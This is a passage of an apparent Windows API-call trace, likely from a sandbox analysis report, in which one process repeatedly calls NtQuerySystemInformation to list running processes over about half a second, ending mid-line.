NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.910] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.910] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, 